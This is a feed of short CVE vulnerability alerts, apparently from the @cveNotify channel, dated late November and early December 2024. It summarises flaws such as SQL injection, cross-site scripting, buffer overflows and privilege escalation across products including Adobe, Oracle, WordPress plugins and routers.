🚨 CVE-2024-46624An issue in InfoDom Performa 365 v4.0.1 allows authenticated attackers to elevate their privileges to Administrator via a crafted payload sent to /api/users.🎖@cveNotify |
|
| 2024-12-03 21:37:58 |
🚨 CVE-2024-52547An authenticated attacker can trigger a stack based buffer overflow in the DHIP Service (TCP port 80). This vulnerability has been resolved in firmware version 2.800.0000000.8.R.20241111.🎖@cveNotify |
|
| 2024-12-03 21:37:52 |
🚨 CVE-2024-52546An unauthenticated attacker can perform a null pointer dereference in the DHIP Service (UDP port 37810). This vulnerability has been resolved in firmware version 2.800.0000000.8.R.20241111.🎖@cveNotify |
|
| 2024-12-03 21:37:51 |
🚨 CVE-2024-53564A serious vulnerability was discovered in FreePBX 17.0.19.17. FreePBX does not verify the type of uploaded files and does not restrict user access paths, allowing attackers to remotely control the FreePBX server by uploading malicious files with malicious content and accessing the default directory where the files are uploaded. This will result in particularly serious consequences.🎖@cveNotify |
|
| 2024-12-03 21:37:50 |
🚨 CVE-2024-36610A deserialization vulnerability exists in the Stub class of the VarDumper module in Symfony v7.0.3. The vulnerability stems from deficiencies in the original implementation when handling properties with null or uninitialized values. An attacker could construct specific serialized data and use this vulnerability to execute unauthorized code. NOTE: the Supplier has concluded that this is a false report.🎖@cveNotify |
|
| 2024-12-03 21:37:46 |
🚨 CVE-2024-7511Trimble SketchUp Pro SKP File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Trimble SketchUp Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PSD files embedded in SKP files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-23000.🎖@cveNotify |
|
| 2024-12-03 21:37:45 |
🚨 CVE-2024-11168The urllib.parse.urlsplit() and urlparse() functions improperly validated bracketed hosts (`[]`), allowing hosts that weren't IPv6 or IPvFuture. This behavior was not conformant to RFC 3986 and potentially enabled SSRF if a URL is processed by more than one URL parser.🎖@cveNotify |
|
| 2024-12-03 21:07:31 |
🚨 CVE-2024-53060In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: prevent NULL pointer dereference if ATIF is not supportedacpi_evaluate_object() may return AE_NOT_FOUND (failure), whichwould result in dereferencing buffer.pointer (obj) while being NULL.Although this case may be unrealistic for the current code, it isstill better to protect against possible bugs.Bail out also when status is AE_NOT_FOUND.This fixes 1 FORWARD_NULL issue reported by CoverityReport: CID 1600951: Null pointer dereferences (FORWARD_NULL)(cherry picked from commit 91c9e221fe2553edf2db71627d8453f083de87a1)🎖@cveNotify |
|
| 2024-12-03 21:07:26 |
🚨 CVE-2023-42945A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1. An app may gain unauthorized access to Bluetooth.🎖@cveNotify |
|
| 2024-12-03 21:07:25 |
🚨 CVE-2024-22337IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279977.🎖@cveNotify |
|
| 2024-12-03 20:38:08 |
🚨 CVE-2024-11968A vulnerability was found in code-projects Farmacia up to 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file pagamento.php. The manipulation of the argument notaFiscal leads to sql injection. The attack can be launched remotely.🎖@cveNotify |
|
| 2024-12-03 20:38:02 |
🚨 CVE-2024-11967A vulnerability was found in PHPGurukul Complaint Management system 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/reset-password.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-03 20:38:01 |
🚨 CVE-2023-49559An issue in vektah gqlparser open-source-library v.2.5.10 allows a remote attacker to cause a denial of service via a crafted script to the parserDirectives function.🎖@cveNotify |
|
| 2024-12-03 20:38:00 |
🚨 CVE-2024-33409SQL injection vulnerability in index.php in campcodes Complete Web-Based School Management System 1.0 allows attacker to execute arbitrary SQL commands via the name parameter.🎖@cveNotify |
|
| 2024-12-03 20:37:56 |
🚨 CVE-2023-42946This issue was addressed with improved redaction of sensitive information. This issue is fixed in tvOS 17.1, watchOS 10.1, macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1. An app may be able to leak sensitive user information.🎖@cveNotify |
|
| 2024-12-03 20:37:55 |
🚨 CVE-2020-11063In TYPO3 CMS versions 10.4.0 and 10.4.1, it has been discovered that time-based attacks can be used with the password reset functionality for backend users. This allows an attacker to mount user enumeration based on email addresses assigned to backend user accounts. This has been fixed in 10.4.2.🎖@cveNotify |
|
| 2024-12-03 20:07:25 |
🚨 CVE-2024-11971A vulnerability classified as problematic was found in Guizhou Xiaoma Technology jpress 5.1.2. Affected by this vulnerability is an unknown functionality of the file /commons/attachment/upload of the component Avatar Handler. The manipulation of the argument files leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-03 19:37:45 |
🚨 CVE-2023-52727Open Networking Foundation SD-RAN ONOS onos-lib-go 0.10.25 allows an index out-of-range condition in parseAlignBits.🎖@cveNotify |
|
| 2024-12-03 19:37:38 |
🚨 CVE-2024-21032Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle E-Business Suite (component: LOV). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Complex Maintenance, Repair, and Overhaul. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Complex Maintenance, Repair, and Overhaul, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Complex Maintenance, Repair, and Overhaul accessible data as well as unauthorized read access to a subset of Oracle Complex Maintenance, Repair, and Overhaul accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-12-03 19:37:37 |
🚨 CVE-2023-2005Vulnerability in Tenable Tenable.Io, Tenable Nessus, Tenable Security Center.This issue affects Tenable.Io: before Plugin Feed ID #202306261202 ; Nessus: before Plugin Feed ID #202306261202 ; Security Center: before Plugin Feed ID #202306261202 .This vulnerability could allow a malicious actor with sufficient permissions on a scan target to place a binary in a specific filesystem location, and abuse the impacted plugin in order to escalate privileges.🎖@cveNotify |
|
| 2024-12-03 19:07:32 |
🚨 CVE-2023-31348A DLL hijacking vulnerability in AMD ?Prof could allow an attacker to achieve privilege escalation, potentially resulting in arbitrary code execution.🎖@cveNotify |
|
| 2024-12-03 18:08:09 |
🚨 CVE-2024-38859XSS in the view page with the SLA column configured in Checkmk versions prior to 2.3.0p14, 2.2.0p33, 2.1.0p47 and 2.0.0 (EOL) allowed malicious users to execute arbitrary scripts by injecting HTML elements into the SLA column title. These scripts could be executed when the view page was cloned by other users.🎖@cveNotify |
|
| 2024-12-03 18:08:08 |
🚨 CVE-2024-28829Least privilege violation and reliance on untrusted inputs in the mk_informix Checkmk agent plugin before Checkmk 2.3.0p12, 2.2.0p32, 2.1.0p47 and 2.0.0 (EOL) allows local users to escalate privileges.🎖@cveNotify |
|
| 2024-12-03 17:38:33 |
🚨 CVE-2024-50648yshopmall V1.0 has an arbitrary file upload vulnerability, which can enable RCE or even take over the server when improperly configured to parse JSP files.🎖@cveNotify |
|
| 2024-12-03 17:38:32 |
🚨 CVE-2024-9902A flaw was found in Ansible. The ansible-core `user` module can allow an unprivileged user to silently create or replace the contents of any file on any system path and take ownership of it when a privileged user executes the `user` module against the unprivileged user's home directory. If the unprivileged user has traversal permissions on the directory containing the exploited target file, they retain full control over the contents of the file as its owner.🎖@cveNotify |
|
| 2024-12-03 17:38:27 |
🚨 CVE-2023-31307Improper validation of array index in Power Management Firmware (PMFW) may allow a privileged attacker to cause an out-of-bounds memory read within PMFW, potentially leading to a denial of service.🎖@cveNotify |
|
| 2024-12-03 17:38:26 |
🚨 CVE-2024-21052Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.34 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-12-03 17:38:21 |
🚨 CVE-2024-20995Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Supported versions that are affected are 19.3-19.22 and 21.3-21.13. Easily exploitable vulnerability allows high privileged attacker having DBA privilege with network access via Oracle Net to compromise Oracle Database Sharding. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Database Sharding. CVSS 3.1 Base Score 2.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-12-03 17:38:20 |
🚨 CVE-2023-42878A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in watchOS 10.1, macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-12-03 17:38:16 |
🚨 CVE-2023-42859The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-12-03 17:38:15 |
🚨 CVE-2023-42858The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-12-03 17:07:49 |
🚨 CVE-2024-27323PDF-XChange Editor Updater Improper Certificate Validation Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is not required to exploit this vulnerability.The specific flaw exists within the update functionality. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22224.🎖@cveNotify |
|
| 2024-12-03 16:09:14 |
🚨 CVE-2024-11797Fuji Electric Monitouch V-SFT V8 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of V8 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24662.🎖@cveNotify |
|
| 2024-12-03 16:09:07 |
🚨 CVE-2024-11794Fuji Electric Monitouch V-SFT V10 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Fuji Electric Monitouch V-SFT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of V10 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24504.🎖@cveNotify |
|
| 2024-12-03 16:09:06 |
🚨 CVE-2024-11666Affected devices beacon to eCharge cloud infrastructure asking if there are any command they should run. This communication is established over an insecure channel since peer verification is disabled everywhere. Therefore, remote unauthenticated users suitably positioned on the network between an EV charger controller and eCharge infrastructure can execute arbitrary commands with elevated privileges on affected devices.This issue affects cph2_echarge_firmware: through 2.0.4.🎖@cveNotify |
|
| 2024-12-03 15:38:16 |
🚨 CVE-2018-9429In buildImageItemsIfPossible of ItemTable.cpp there is a possible out of bound read due to uninitialized data. This could lead to information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-12-03 15:38:10 |
🚨 CVE-2018-9426In RsaKeyPairGenerator::getNumberOfIterations of RSAKeyPairGenerator.java, an incorrect implementation could cause weak RSA key pairs being generated. This could lead to crypto vulnerability with no additional execution privileges needed. User interaction is not needed for exploitation. Bulletin Fix: The fix is designed to correctly implement the key generation according to FIPS standard.🎖@cveNotify |
|
| 2024-12-03 15:38:09 |
🚨 CVE-2024-53484Ever Traduora 0.20.0 and below is vulnerable to Privilege Escalation due to the use of a hard-coded JWT signing key.🎖@cveNotify |
|
| 2024-12-03 15:38:08 |
🚨 CVE-2024-52724ZZCMS 2023 was discovered to contain a SQL injection vulnerability in /q/show.php.🎖@cveNotify |
|
| 2024-12-03 15:38:04 |
🚨 CVE-2024-54159stalld through 1.19.7 allows local users to cause a denial of service (file overwrite) via a /tmp/rtthrottle symlink attack.🎖@cveNotify |
|
| 2024-12-03 15:38:03 |
🚨 CVE-2024-11744A vulnerability has been found in 1000 Projects Portfolio Management System MCA 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /register.php. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.🎖@cveNotify |
|
| 2024-12-03 10:38:22 |
🚨 CVE-2024-45106Improper authentication of an HTTP endpoint in the S3 Gateway of Apache Ozone 1.4.0 allows any authenticated Kerberos user to revoke and regenerate the S3 secrets of any other user. This is only possible if: * ozone.s3g.secret.http.enabled is set to true. The default value of this configuration is false. * The user configured in ozone.s3g.kerberos.principal is also configured in ozone.s3.administrators or ozone.administrators.Users are recommended to upgrade to Apache Ozone version 1.4.1 which disables the affected endpoint.🎖@cveNotify |
|
| 2024-12-03 10:38:21 |
🚨 CVE-2024-11325The AWeber Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-03 09:38:30 |
🚨 CVE-2024-11844The IdeaPush plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the idea_push_taxonomy_save_routine function in all versions up to, and including, 8.71. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete terms for the "boards" taxonomy.🎖@cveNotify |
|
| 2024-12-03 07:37:30 |
🚨 CVE-2024-9058The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Lightbox widget in all versions up to, and including, 5.10.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-03 06:37:53 |
🚨 CVE-2024-49413Improper Verification of Cryptographic Signature in SmartSwitch prior to SMR Dec-2024 Release 1 allows local attackers to install malicious applications.🎖@cveNotify |
|
| 2024-12-03 06:37:47 |
🚨 CVE-2024-49412Improper input validation in Settings prior to SMR Dec-2024 Release 1 allows local attackers to broadcast signal for discovering Bluetooth on Galaxy Watch.🎖@cveNotify |
|
| 2024-12-03 06:37:46 |
🚨 CVE-2024-10893The WP Booking Calendar WordPress plugin before 10.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-12-03 06:37:45 |
🚨 CVE-2024-10484The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Team' widget in all versions up to, and including, 2.16.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-03 03:38:09 |
🚨 CVE-2024-9694The CMSMasters Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.14.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-03 03:38:08 |
🚨 CVE-2024-20125In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained System privileges. User interaction is not needed for exploitation. Patch ID: ALPS09046782; Issue ID: MSV-1728.🎖@cveNotify |
|
| 2024-12-03 02:38:12 |
🚨 CVE-2024-9200A post-authentication command injection vulnerability in the "host" parameter of the diagnostic function in Zyxel VMG4005-B50A firmware versions through V5.15(ABQA.2.2)C0 could allow an authenticated attacker with administrator privileges to execute operating system (OS) commands on a vulnerable device.🎖@cveNotify |
|
| 2024-12-03 02:38:11 |
🚨 CVE-2021-20784HTTP header injection vulnerability in Everything version 1.0, 1.1, and 1.2 except the Lite version may allow a remote attacker to inject an arbitrary script or alter the website that uses the product.🎖@cveNotify |
|
| 2024-12-03 01:37:49 |
🚨 CVE-2018-9441In sdp_copy_raw_data of sdp_discovery.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-12-02 23:37:42 |
🚨 CVE-2024-53937An issue was discovered on Victure RX1800 WiFi 6 Router (software EN_V1.0.0_r12_110933, hardware 1.0) devices. The TELNET service is enabled by default with admin/admin as default credentials and is exposed over the LAN. The allows attackers to execute arbitrary commands with root-level permissions. Device setup does not require this password to be changed during setup in order to utilize the device. (However, the TELNET password is dictated by the current GUI password.)🎖@cveNotify |
|
| 2024-12-02 23:07:54 |
🚨 CVE-2024-49523Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-12-02 23:07:53 |
🚨 CVE-2024-45153Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-12-02 22:37:39 |
🚨 CVE-2023-44347Adobe InDesign versions ID18.5 (and earlier) and ID17.4.2 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 22:37:33 |
🚨 CVE-2023-44346Adobe InDesign versions ID18.5 (and earlier) and ID17.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 22:37:32 |
🚨 CVE-2023-44343Adobe InDesign versions ID18.5 (and earlier) and ID17.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 22:37:31 |
🚨 CVE-2023-44342Adobe InDesign versions ID18.5 (and earlier) and ID17.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 22:08:05 |
🚨 CVE-2024-26034Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-12-02 22:07:58 |
🚨 CVE-2024-26030Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-12-02 22:07:57 |
🚨 CVE-2024-26028Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-12-02 21:37:49 |
🚨 CVE-2024-34099Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 21:37:42 |
🚨 CVE-2024-34095Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 21:37:41 |
🚨 CVE-2024-34094Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 21:37:37 |
🚨 CVE-2024-30311Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 21:37:36 |
🚨 CVE-2024-30301Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 21:08:00 |
🚨 CVE-2024-30290Adobe Framemaker versions 2020.5, 2022.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 21:07:53 |
🚨 CVE-2024-30287Adobe Framemaker versions 2020.5, 2022.3 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 21:07:52 |
🚨 CVE-2024-30283Adobe Framemaker versions 2020.5, 2022.3 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 20:37:44 |
🚨 CVE-2024-53364A SQL injection vulnerability was found in PHPGURUKUL Vehicle Parking Management System v1.13 in /users/view-detail.php. This vulnerability affects the viewid parameter, where improper input sanitization allows attackers to inject malicious SQL queries.🎖@cveNotify |
|
| 2024-12-02 20:37:37 |
🚨 CVE-2024-30307Substance3D - Painter versions 9.1.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 20:37:36 |
🚨 CVE-2023-44341Adobe InDesign versions ID18.5 (and earlier) and ID17.4.2 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 20:07:54 |
🚨 CVE-2024-1675Insufficient policy enforcement in Download in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-12-02 20:07:53 |
🚨 CVE-2024-1674Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-12-02 19:37:41 |
🚨 CVE-2024-5890ServiceNow has addressed an HTML injection vulnerability that was identified in the Now Platform. This vulnerability could potentially enable an unauthenticated user to modify a web page or redirect users to another website.ServiceNow released updates to customers that addressed this vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance(s) as soon as possible.🎖@cveNotify |
|
| 2024-12-02 19:37:40 |
🚨 CVE-2024-53484Ever Traduora 0.20.0 and below is vulnerable to Privilege Escalation due to the use of a hard-coded JWT signing key.🎖@cveNotify |
|
| 2024-12-02 19:37:36 |
🚨 CVE-2024-53861pyjwt is a JSON Web Token implementation in Python. An incorrect string comparison is run for `iss` checking, resulting in `"acb"` being accepted for `"_abc_"`. This is a bug introduced in version 2.10.0: checking the "iss" claim changed from `isinstance(issuer, list)` to `isinstance(issuer, Sequence)`. Since str is a Sequnce, but not a list, `in` is also used for string comparison. This results in `if "abc" not in "__abcd__":` being checked instead of `if "abc" != "__abc__":`. Signature checks are still present so real world impact is likely limited to denial of service scenarios. This issue has been patched in version 2.10.1. All users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-12-02 19:37:35 |
🚨 CVE-2022-4395The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.🎖@cveNotify |
|
| 2024-12-02 18:38:13 |
🚨 CVE-2024-47078Meshtastic is an open source, off-grid, decentralized, mesh network. Meshtastic uses MQTT to communicate over an internet connection to a shared or private MQTT Server. Nodes can communicate directly via an internet connection or proxied through a connected phone (i.e., via bluetooth). Prior to version 2.5.1, multiple weaknesses in the MQTT implementation allow for authentication and authorization bypasses resulting in unauthorized control of MQTT-connected nodes. Version 2.5.1 contains a patch.🎖@cveNotify |
|
| 2024-12-02 18:38:12 |
🚨 CVE-2024-22272VMware Cloud Director contains an Improper Privilege Management vulnerability. An authenticated tenant administrator for a given organization within VMware Cloud Director may be able to accidentally disable their organization leading to a Denial of Service for active sessions within their own organization's scope.🎖@cveNotify |
|
| 2024-12-02 18:38:11 |
🚨 CVE-2024-34923In Avocent DSR2030 Appliance firmware 03.04.00.07 before 03.07.01.23, and SVIP1020 Appliance firmware 01.06.00.03 before 01.07.00.00, there is reflected cross-site scripting (XSS).🎖@cveNotify |
|
| 2024-12-02 18:07:50 |
🚨 CVE-2024-30282Animate versions 24.0.2, 23.0.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-02 17:37:42 |
🚨 CVE-2023-36366An issue in the log_create_delta component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2024-12-02 17:37:35 |
🚨 CVE-2023-36363An issue in the __nss_database_lookup component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2024-12-02 17:37:34 |
🚨 CVE-2023-36362An issue in the rel_sequences component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2024-11-25 16:37:48 |
🚨 CVE-2024-35401TOTOLINK CP900L v4.1.5cu.798_B20221228 was discovered to contain a command injection vulnerability via the FileName parameter in the UploadFirmwareFile function.🎖@cveNotify |
|
| 2024-11-25 16:37:41 |
🚨 CVE-2024-27906Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated users to view DAG code and import errors of DAGs they do not have permission to view through the API and the UI.Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability🎖@cveNotify |
|
| 2024-11-25 16:37:40 |
🚨 CVE-2023-28461Array Networks Array AG Series and vxAG (9.4.0.481 and earlier) allow remote code execution. An attacker can browse the filesystem on the SSL VPN gateway using a flags attribute in an HTTP header without authentication. The product could then be exploited through a vulnerable URL. The 2023-03-09 vendor advisory stated "a new Array AG release with the fix will be available soon."🎖@cveNotify |
|
| 2024-11-25 15:39:07 |
🚨 CVE-2024-11671Improper authentication in SQL data source MFA validation in Devolutions Remote Desktop Manager 2024.3.17 and earlier on Windows allows an authenticated user to bypass the MFA validation via data source switching.🎖@cveNotify |
|
| 2024-11-25 15:39:06 |
🚨 CVE-2024-11670Incorrect authorization in the permission validation component of Devolutions Remote Desktop Manager 2024.2.21 and earlier on Windows allows a malicious authenticated user to bypass the "View Password" permission via specific actions.🎖@cveNotify |
|
| 2024-11-25 15:39:03 |
